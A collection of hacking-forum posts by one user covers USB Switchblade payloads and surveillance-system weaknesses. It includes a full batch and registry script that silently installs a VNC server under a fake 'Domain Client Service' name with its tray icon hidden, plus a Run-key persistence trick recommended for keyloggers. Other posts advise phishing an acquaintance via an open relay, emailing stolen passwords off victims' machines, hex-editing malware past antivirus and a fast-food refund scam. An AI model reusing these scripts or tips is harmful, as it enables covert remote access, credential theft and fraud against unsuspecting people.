AndyzBong

*nod*

I've got a couple more pictures to take but I figure that I might as well post my lame.. umm.. mod? http://andyzbong.angelfire.com/index.html I would just post the image but angelfire (yeah.. I know) would replace it with the "this image is hosted by angelfire" bs. Love it or hate it; I will be making a "wITTy" mod as well. If you're thinking of "T"; then you've never been to an ITT campus. - AndyzBong

I know that I am about 10 days late to reply to this post, but http://canyouseeme.org is also a good site to use; other-than http://portforward.com

I agree with most that social engineering would be the best way to go about this. Perhaps a fake phishing email sent through an open mail relay server would be your best bet. You know him personally so you know the vulnerabilities in his character.

Yes, just like in Space Rouge's article; you can use Google to view and move (PTZ) cameras. However, you will not be able to stop the recording or disable the surveillance system in anyway. Actually, most of these "Google hack" cameras are meant to be viewed over the internet without a login or password; as they are always in "guest mode". You could DDoS the address; but even then, you're not "hacking" (and all recorded video events will still be on the local machine) - AndyzBong

I'm in. And since I have already written an article for Analog5; I'm on the score board. This weekend I will write up another article; but me and Famicoman can't write an entire e-zine ourselves. Writing an article for Analog5 would be a great way to earn points.

Howdy all, I recently was employed as a "Surveillance System Software Support Specialist" for a private video surveillance company here in Pa. Now, we all know that if you aim an infrared laser-pointer at an IR surveillance camera at night, you will completely "white out" the camera; but today I wanted to discuss some of the other vulnerabilities in not only the surveillance cameras, but the PC that runs the surveillance software. First off, all of our PCs are running Windows XP and automatically login to windows under an administrator account without password verification. The reason I was given for this; is so when there is a power outage the computer will automatically reboot when the UPS is out of battery and the power is restored. Good, great, grand, and wonderful... but it doesn't have to be an administrative user. However, I just do what I'm told. Secondly, when Windows XP boots the surveillance software runs on startup, logged in under "guest mode". Guest allows you to do nothing (such as Stop Monitoring, exit full screen mode, exit the software, etc). My boss thinks that "When you're logged in as guest, you cannot close the software or make any changes." However, you can run task manager and kill the process. Our software's process is not run under system it is run under the administrative user. Lastly, I do not install the surveillance cameras or run their conduit, but I have learned a lot about how surveillance cameras can pick up interference. A couple of our customers are machine shops (machinist), who want to keep a watchful eye on their carbide supply. The exterior of the building is usually aluminum and the welders like to ground their equipment to the beams of the building. This gives the entire building a negative charge which will go through the metal housing of the cameras and cause interference on the cameras that looks like HBO porn before a descrambler. I asked a camera installer if I put a 9v battery up to the housing of the camera, would it cause the same interference? His response was "I wouldn't doubt it." And our wireless cameras? Worse. Now this is not the same for every video surveillance company, just the companies that cheat their customers and fill up the pockets of the boss. We don't even use shielding for any of the cameras unless there is a cell phone base tower right next door to our customer (or some other equivalent of massive interference). One final note, the administrative login to ALL of our customers is "admin" and the administrative password to ALL of our customers is eight characters all lowercase. If you could run a dictionary attack on our software's login page, not only would you be in on one computer, but if you had a copy of our clients' DNS addresses... you'd be admin on them all. PS: Since our surveillance systems are PC-based, our customers enjoy monitoring their cameras from home via the internet. If one were to stumble upon their DNS address and reached a login page; one would only have to login as "guest" with no password in-order to view the cameras. Just like Space Rogue's write-up about Google hacking surveillance systems. http://www.spacerogue.net/wordpress/?p=38 - AndyzBong

Howdy all, I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this: @echo off REM Silent Install of TightVNC server REM Script by kz26 REM Copy VNC Server Files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM Install fake WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Port: 8080 REM Username: N/A REM Password: hacked net start winvnc :End exit This are my reg1.reg and reg2.reg code(s): reg1.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 "AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 and finally, this is my go.cmd code that launches vnc.cmd: @echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 start /b .vnc.cmd @echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 :End exit This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine. Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon? - AndyzBong

Hello all, Recently a friend of mine at ITT who works at McDonalds informed me of an interesting trick. This little "hack" allows you to get an additional Double-Quarter Pounder burger at McDonalds. You should really do this with two separate people on two separate orders. Step 1: Order a regular Quarter Pounder burger and a Double Quarter Pounder burger. (add other items if you wish to disguise the "hack") Step 2: Upon receiving your food, place your Quarter Pounder burger in the Double Quarter Pounder box and hide the double Quarter Pounder. Step 3: Tell cashier that there has been a mistake and you have received a regular Quarter Pounder instead of a double. (both the double and single sandwich come in the same "Quarter Pounder" box) Step 4: Receive another double Quarter Pounder in replacement of your single Quarter Pounder. You now have two double Quarter Pounder McDonald burgers. Enjoy, AndyzBong (information provided by Paul "Wall" P.)

One of the more creative uses of the USB Switchblade is the Folding@Home capability. I once read an article about a software programmer who just happened to have SETI@Home installed on his wife's laptop that was stolen. Long story short, when the thieves logged into the internet with the stolen laptop and the screen-saver was activated, SETI went into effect. The laptop automatically logged itself into the SETI@Home account and displayed it's new IP. The ISP was contacted, records were seized, thieves got arrest, the laptop got returned. I do not know why you would go through all this trouble for (what should be) a 512mb flash-drive. If you are worried about a lost Switchblade and revenge is your primary concern; I would set the payload to e-mail you (a junk Yahoo account) the captured logs/passwords (as well as store them on the USB). It may not be stealthy, but I hope it helped. Heres the SETI article: http://www.virtuallystrange.net/ufo/update...b/m15-005.shtml

Kimberly might not be too happy to find out that her full name and work email are so public. Very nice find secret52.

I have heard of such "EXE Binders", being used to combine animated greeting-card software and trojan horse servers. Wikipedia "File Binder". As far as a *.jpeg file being binded with an *.exe ... I do have to admit; I have downloaded such a program. Anti-Virus caught it and I decided not to test it out. DLL Injections are cooler anyways. - AndyzBong

Enlightened about the quotations, gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.

So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade and I decided that I wanted one of my particular payloads to be dumped in my "victims" Startup folder (for execution upon the next reboot). Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxs that say "Your system is critically running low on virtual memory!". Hence the program is named VirtuMem.exe It all seemed simple enough right? copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this. Anywho, if you are familiar with SysInternal's freeware program called AutoRuns; then you know that applications such as AIM, QuickTime, Symantec, and other software-vendors can autorun their applications upon login without having a .LNK file in the Startup folder. My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "VirtuMem"="C:WINDOWSSYSTEM32VirtuMem.exe" and then add the following code to my go.cmd file: @echo [START AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 echo. >> Documentslogfiles%computername%.log 2>&1 copy H:WIPCMDVirtuMem.exe C:WINDOWSSYSTEM32 regedit.exe /s WIPCMDstartup.reg echo. >> Documentslogfiles%computername%.log 2>&1 @echo [END AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1 I just figure it was a neat trick that I would share with the community. This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. This also could be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates the WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them). Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far; this code is untested. In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info; let me know. This code is for Windows XP Pro (as far as I know). Peace. - AndyzBong

Try Googling "Hexing Your Malware" (without the quotations). This was a suggestion that I read off a post in the old forums. The first link from GovernmentSecurity.org is a forum post with horrible spelling mistakes. I deciphered the instructions, downloaded Hex Workshop, tested, failed, retested, failed, re-retested, failed. (You get the idea?) So I do not suggest that particular article, but there are about 297,000 results so have fun experimenting.... oh.. and deciphering. - AndyzBong